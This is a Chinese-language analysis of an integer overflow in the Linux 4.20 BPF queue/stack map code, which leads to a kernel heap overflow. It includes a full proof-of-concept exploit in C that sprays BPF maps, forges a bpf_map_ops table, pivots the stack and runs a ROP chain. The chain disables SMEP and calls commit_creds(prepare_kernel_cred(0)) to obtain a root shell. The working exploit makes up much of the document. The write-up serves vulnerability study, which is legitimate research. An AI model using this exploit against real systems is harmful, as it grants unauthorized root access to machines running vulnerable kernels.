kernel4.20_BPF_LPE 分析
漏洞分析
涉及的数据结构:
+struct bpf_queue_stack {
+ struct bpf_map map;
+ raw_spinlock_t lock;
+ u32 head, tail;
+ u32 size; /* max_entries + 1 */
+
+ char elements[0] __aligned(8);
+};
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
u32 pages;
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
bool unpriv_array;
/* 55 bytes hole */
/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
struct user_struct *user ____cacheline_aligned;
atomic_t refcnt;
atomic_t usercnt;
struct work_struct work;
char name[BPF_OBJ_NAME_LEN];
};
/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);
/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
u32 (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf_type *key_type,
const struct btf_type *value_type);
};
290 union bpf_attr {
291 struct { /* anonymous struct used by BPF_MAP_CREATE command */
292 __u32 map_type; /* one of enum bpf_map_type */
293 __u32 key_size; /* size of key in bytes */
294 __u32 value_size; /* size of value in bytes */
295 __u32 max_entries; /* max number of entries in a map */
296 __u32 map_flags; /* BPF_MAP_CREATE related
297 * flags defined above.
……
漏洞调用链,分配qs堆块:
__x64_sys_bpf()
->map_create()
->find_and_alloc_map()
->queue_stack_map_alloc()
+static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
+{
+ int ret, numa_node = bpf_map_attr_numa_node(attr);
+ struct bpf_queue_stack *qs;
+ u32 size, value_size;
+ u64 queue_size, cost;
+
+ size = attr->max_entries + 1;//如果max_entries为0xffffffff,就会造成溢出
+ value_size = attr->value_size;
+
+ queue_size = sizeof(*qs) + (u64) value_size * size;
+
+ cost = queue_size;
+ if (cost >= U32_MAX - PAGE_SIZE)
+ return ERR_PTR(-E2BIG);
+
+ cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;
+
+ ret = bpf_map_precharge_memlock(cost);
+ if (ret < 0)
+ return ERR_PTR(ret);
+
+ qs = bpf_map_area_alloc(queue_size, numa_node);//造成qs分配的空间很小,但可以访问elements进行溢出,越界写
+ if (!qs)
+ return ERR_PTR(-ENOMEM);
+
+ memset(qs, 0, sizeof(*qs));
+
+ bpf_map_init_from_attr(&qs->map, attr);
+
+ qs->map.pages = cost;
+ qs->size = size;
+
+ raw_spin_lock_init(&qs->lock);
+
+ return &qs->map;
+}
之后利用update系统调用,对qs堆块进行越界写:
__x64_sys_bpf()
->map_update_elem()
->queue_stack_map_push_elem()//堆溢出
+static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+ u64 flags)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long irq_flags;
+ int err = 0;
+ void *dst;
+
+ /* BPF_EXIST is used to force making room for a new element in case the
+ * map is full
+ */
+ bool replace = (flags & BPF_EXIST);
+
+ /* Check supported flags for queue and stack maps */
+ if (flags & BPF_NOEXIST || flags > BPF_EXIST)
+ return -EINVAL;
+
+ raw_spin_lock_irqsave(&qs->lock, irq_flags);
+
+ if (queue_stack_map_is_full(qs)) {
+ if (!replace) {
+ err = -E2BIG;
+ goto out;
+ }
+ /* advance tail pointer to overwrite oldest element */
+ if (unlikely(++qs->tail >= qs->size))
+ qs->tail = 0;
+ }
+
+ dst = &qs->elements[qs->head * qs->map.value_size];
+ memcpy(dst, value, qs->map.value_size);//value为用户可控的数据,dst为elements数组
+
+ if (unlikely(++qs->head >= qs->size))
+ qs->head = 0;
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
+ return err;
+}
如果传入max_entries为0xffffffff,此时size为0,最后申请的qs的大小为sizeof(*qs),会通过kmalloc-256申请一个0x100的堆块,前0xd0存放bpf_queue_stack前半部分结构,剩余0x30存放elements数组(elements字段在结构体中偏移为0xd0),所以elements[6],即为下一个bpf_queue_stack结构的起始地址。
elements[6]可覆盖下一个bpf_queue_stack结构的bpf_map->bpf_map_ops,伪造一个bpf_map_ops虚函数表。
覆盖void (*map_release)(struct bpf_map *map, struct file *map_file);为rop链,首先进行栈切换,将栈切到用户态,并在伪造的栈上布置rop链进行提权,这种利用方式需要关闭smap,同时由于没有泄露信息,所以没有绕过kaslr。
漏洞利用
/*************************************************************
* File Name: poc.c
*
* Created on: 2020-05-26 07:56:22
* Author: De4dCr0w
*
* Last Modified: 2020-05-28 05:12:50
* Description:
************************************************************/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <string.h>
#include <signal.h>
#include <endian.h>
#define BPF_OBJ_NAME_LEN 16U
#define __u32 uint32_t
#define __aligned_u64 uint64_t
#define __u64 uint64_t
#define __NR_bpf 321
union bpf_attr {
struct { /* anonymous struct used by BPF_MAP_CREATE command */
__u32 map_type; /* one of enum bpf_map_type */
__u32 key_size; /* size of key in bytes */
__u32 value_size; /* size of value in bytes */
__u32 max_entries; /* max number of entries in a map */
__u32 map_flags; /* BPF_MAP_CREATE related
* flags defined above.
*/
__u32 inner_map_fd; /* fd pointing to the inner map */
__u32 numa_node; /* numa node (effective only if
* BPF_F_NUMA_NODE is set).
*/
char map_name[BPF_OBJ_NAME_LEN];
__u32 map_ifindex; /* ifindex of netdev to create on */
__u32 btf_fd; /* fd pointing to a BTF type data */
__u32 btf_key_type_id; /* BTF type_id of the key */
__u32 btf_value_type_id; /* BTF type_id of the value */
};
struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */
__u32 map_fd;
__aligned_u64 key;
union {
__aligned_u64 value;
__aligned_u64 next_key;
};
__u64 flags;
};
};
#define KERNCALL __attribute__((regparm(3)))
void* (*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xFFFFFFFF810E3D40; // TODO:change it
void (*commit_creds)(void*) KERNCALL = (void*) 0xFFFFFFFF810E3AB0; // TODO:change it
uint64_t pop_rax_ret = 0xffffffff81029c71; // pop rax ; ret ;
uint64_t native_write_cr4 = 0xffffffff810037d5; // mov cr4, rax; push rcx; popfq; ret;
uint64_t pop_rdi_ret = 0xffffffff810013b9; // pop rdi ; ret ;
uint64_t pop_rsi_ret = 0xffffffff81001c50; // pop rdi ; ret ;
uint64_t push_rax_push_rsi = 0xffffffff81264e0b; // push rax; push rsi; ret;
uint64_t swapgs_ret = 0xffffffff81c00d5a; // swapgs; popfq; retq;
uint64_t iretq = 0xffffffff8106d8f4; // iretq; cli;
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_stat() {
asm(
"movq %%cs, %0;"
"movq %%ss, %1;"
"movq %%rsp, %2;"
"pushfq;"
"popq %3;"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags) : : "memory");
}
void shell()
{
if(!getuid())
{
printf("[+] you got root!\n");
system("/bin/sh");
}
else
{
printf("[T.T] privilege escalation failed !!!\n");
}
exit(0);
}
uint64_t victim[16];
void spray(union bpf_attr *attr)
{
for(int i = 0; i < 16; i++){
victim[i] = syscall(__NR_bpf, 0, attr, 0x2c);
}
return;
}
void close_map_fd(){
for(int i = 0; i < 16; i++){
close(victim[i]);
}
return;
}
int malloc_map(union bpf_attr *user_attr){
memset(user_attr, 0, sizeof(union bpf_attr));
user_attr->map_type = 0x17; //BPF_MAP_TYPE_STACK
user_attr->key_size = 0;
user_attr->value_size = 0x40;
user_attr->max_entries = -1;
user_attr->map_flags = 0;
user_attr->inner_map_fd = -1;
user_attr->numa_node = 0;
printf("[+] user_attr : %p\n", user_attr);
int res = syscall(__NR_bpf, 0, user_attr, 0x2c);
if(res == -1){
printf("__NR_bpf 0 error!\n");
exit(0);
}
printf("res : %d\n", res);
return res;
}
void update_map(int res, union bpf_attr *user_attr, uint64_t fake_elements){
user_attr->map_fd = res;
user_attr->key = 0;
user_attr->value = (uint64_t)fake_elements;
user_attr->flags = 2;
res = syscall(__NR_bpf, 2, user_attr, 0x2c);
}
void get_shell_again(){
puts("SIGSEGV found");
puts("get shell again");
system("id");
char *shell = "/bin/sh";
char *args[] = {shell, NULL};
execve(shell, args, NULL);
}
int main()
{
signal(SIGSEGV, get_shell_again);
save_stat();
union bpf_attr *user_attr = malloc(sizeof(union bpf_attr));
int res = malloc_map(user_attr);
spray(user_attr);
uint64_t *fake_ops = mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
void *rop_base = mmap((void *)0x81012000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
if(rop_base < 0){
perror("[-] mmap failed!\n");
}
int i = 0;
uint64_t rop[0x30];
rop[i++] = pop_rax_ret;
rop[i++] = 0x6f0;
rop[i++] = native_write_cr4;
rop[i++] = pop_rdi_ret;
rop[i++] = 0;
rop[i++] = (uint64_t )prepare_kernel_cred;
rop[i++] = pop_rsi_ret; // 将pop_rdi_ret 地址给rsi
rop[i++] = pop_rdi_ret;
rop[i++] = push_rax_push_rsi; // 压入rax, rsi,此时就会执行pop_rdi_ret, 然后将rax的内容给rdi
rop[i++] = (uint64_t )commit_creds;
rop[i++] = swapgs_ret;
rop[i++] = 0;
rop[i++] = iretq;
rop[i++] = (uint64_t )&shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
memcpy((void *)(rop_base + 0x75a), &rop, sizeof(rop));
uint64_t xchg_esp = 0xffffffff8101275a; // xchg eax, esp; ret;
printf("[+] xchg_esp: 0x%lx\n", xchg_esp);
fake_ops[2] = xchg_esp;
uint64_t *fake_elements = malloc(0x40);
for(int i = 0; i < 8; i++){
fake_elements[i] = i;
}
fake_elements[6] = (uint64_t)fake_ops;
printf("[+] fake_elements: %p\n", fake_elements);
update_map(res, user_attr, (uint64_t)fake_elements);
close_map_fd();
return 0;
}
首先分配一个map,触发漏洞,之后对map进行更新,越界写,覆盖elements[6] 为伪造的ops,覆盖map_release函数指针为rop链(切换到用户栈),之后close map会触发map_release,调用rop链,进行提权。
对越界读的尝试
讲道理能够越界访问elements,应该就可以越界读,泄露bpf_map_ops的地址,引入的补丁中也可以读取elements的内容:
+static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long flags;
+ int err = 0;
+ void *ptr;
+
+ raw_spin_lock_irqsave(&qs->lock, flags);
+
+ if (queue_stack_map_is_empty(qs)) {
+ err = -ENOENT;
+ goto out;
+ }
+
+ ptr = &qs->elements[qs->tail * qs->map.value_size];
+ memcpy(value, ptr, qs->map.value_size);
+
+ if (delete) {
+ if (unlikely(++qs->tail >= qs->size))
+ qs->tail = 0;
+ }
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, flags);
+ return err;
+}
+
+
+static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long flags;
+ int err = 0;
+ void *ptr;
+ u32 index;
+
+ raw_spin_lock_irqsave(&qs->lock, flags);
+
+ if (queue_stack_map_is_empty(qs)) {
+ err = -ENOENT;
+ goto out;
+ }
+
+ index = qs->head - 1;
+ if (unlikely(index >= qs->size))
+ index = qs->size - 1;
+
+ ptr = &qs->elements[index * qs->map.value_size];
+ memcpy(value, ptr, qs->map.value_size);
+
+ if (delete)
+ qs->head = index;
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, flags);
+ return err;
+}
+/* Called from syscall or from eBPF program */
+static int queue_map_peek_elem(struct bpf_map *map, void *value)
+{
+ return __queue_map_get(map, value, false);
+}
+
+/* Called from syscall or from eBPF program */
+static int stack_map_peek_elem(struct bpf_map *map, void *value)
+{
+ return __stack_map_get(map, value, false);
+}
通过调用map_lookup_elem->map->ops->map_peek_elem->__queue_map_get ,调用到上述读取elements内容。
case BPF_MAP_LOOKUP_ELEM:
err = map_lookup_elem(&attr);
break;
else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_peek_elem(map, value);
用户态代码为:
user_attr->map_fd = res;
user_attr->key = 0;
user_attr->value = (uint64_t)leak;
user_attr->flags = 0;
syscall(__NR_bpf, 1, user_attr, 0x2c);
printf("[+] leak : 0x%lx\n", leak[0]);
但是过不了queue_stack_map_is_empty(qs) 的判断,一开始elments为空,不让读取,需要填充数据去调用map_update_elem,但由于写数据用的是memcpy,直接复制value_size大小的数据,所以后续读的时候也是读到也是update进去的数据,之前的bpf_map_ops的地址已经被覆盖了,无法泄露。
参考链接
http://p4nda.top/2019/01/02/kernel-bpf-overflow/#%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
https://www.anquanke.com/post/id/166819#h3-5
https://github.com/ww9210/kernel4.20_bpf_LPE
引入漏洞的补丁: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/bpf?id=f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92
commit:f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92